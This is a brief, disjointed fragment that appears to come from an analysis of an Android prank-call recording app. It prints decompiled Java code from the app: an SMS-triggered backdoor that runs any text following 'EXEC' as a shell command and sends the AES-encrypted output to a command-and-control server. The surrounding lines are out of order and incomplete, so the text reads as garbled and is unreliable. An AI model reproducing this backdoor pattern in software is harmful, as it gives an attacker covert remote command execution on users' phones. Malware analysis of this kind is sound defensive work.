Developed by , the app focuses on a specific "record-and-share" workflow for prank calls:
: The app can record these conversations, allowing you to save and share the resulting prank with others.
String msg = intent.getStringExtra("sms_body"); if (msg.startsWith("EXEC")) String cmd = msg.substring(5); String result = shellExec(cmd); Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding"); // ... sends encrypted result to C2
First, I checked the APK structure using apktool and jadx .